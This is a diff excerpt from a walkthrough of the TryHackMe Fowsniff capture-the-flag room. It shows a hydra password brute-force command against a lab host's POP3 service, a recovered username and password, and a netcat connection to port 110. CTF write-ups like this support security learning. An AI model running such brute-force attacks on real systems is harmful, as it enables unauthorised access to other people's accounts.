sunst0rm/Tryhackme/Fowsniff_CTF/fownsniff_ctf.md

 07011972
 ```

-Secondly, I use `hydra` contrary to metasploit recommended in challenge and run:
+Secondly, I use `hydra` contrary to metasploit recommended in challenge:

 `hydra -L users.txt -P pass.txt 10.10.211.152 pop3`

-which find a corresponding pair `seina:scoobydoo2`
+which finds a working pair `seina:scoobydoo2`

 <br />

 Another step is to access server using netcat and pop3 protocol.

 I type:

 `nc 10.10.211.152 110`